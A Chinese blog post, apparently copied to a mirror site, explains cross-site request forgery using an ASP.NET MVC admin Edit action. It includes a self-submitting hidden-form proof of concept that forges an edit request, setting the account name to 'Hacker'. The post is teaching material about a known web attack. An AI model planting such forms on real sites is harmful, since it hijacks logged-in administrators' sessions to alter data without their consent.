zoukankan      html  css  js  c++  java
  • 跨站请求伪造CSRF(Cross-site request forgery)

    CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用

    一般被攻击步骤:

    1.登录受信任网站A,并在本地生成Cookie。  

    2.在不登出A的情况下,访问危险网站B。

    所以没事的时候不要乱点链接不是随便说着玩的。

    常见场景分析:

    假设你有一个这样的Action,因为已经加了[Authorize(Roles = "Admins")]标记,所以只有管理员角色才可以提交数据

    [HttpPost]
    [Authorize(Roles = "Admins")]
    public ActionResult Edit(ProductDetails productdetails)
    {
        if (ModelState.IsValid)
        {
            db.Entry(productdetails).State = EntityState.Modified;
            db.SaveChanges();
            return RedirectToAction("Index");
        }
        return View(productdetails);
    } 
    

    非管理员访问这个请求会被重定向到登录页,目前来看还是相对安全的。

     那么假设有一个管理员已经登录了网站,就是说上面的第一步已经完成,

    坐等第二步,第二步 如何实现呢,其实很简单,

    一个恶意分子 模拟了这个表单提交,并且把这个表单放到了一个恶意网站下面,

    如果上面的网站管理员碰巧点了这个链接(比如收到一个恶意邮件,诸如此类),恶意链接被点开并加载以后,

    那么这个时候上面的Edit 请求就被管理员无意识的触发了,

    第二步操作完成,攻击成功。

    <form name="csrfhackForm" method="post"
        action="http://localhost:63577/ProductDetails/Edit">
        <input type="hidden" name="Id" value="1" />
        <input type="hidden" name="LicenseCount" value="5" />
        <input type="hidden" name="LicenseUsedCount" value="1" />
        <input type="hidden" name="AccountUserName" value="Hacker" />
        <input type="hidden" name="ProductName" value="B2B Product 101" />
    </form>
    <script type="text/javascript">
        document.csrfhackForm.submit();
    </script> 
    

     http://www.devcurry.com/2013/01/what-is-antiforgerytoken-and-why-do-i.html

  • 相关阅读:
    2015的最后一天
    网络类型IPv4和IPv6什么意思?区别?
    2:文档编辑生成目录相关方法说明
    TCP与UDP的区别
    vs 2012 InstallShield Limited Edition Project 打包windows服务解析
    百科编辑器ueditor应用笔记
    百度编辑器Ueditor 初始化加载内容失败解决办法
    矩阵-DirectX与OpenGL的不同
    ios系统中各种设置项的url链接
    简单的优化处理 By LINQ TO SQL
  • 原文地址:https://www.cnblogs.com/LittleFeiHu/p/6666520.html
Copyright © 2011-2022 走看看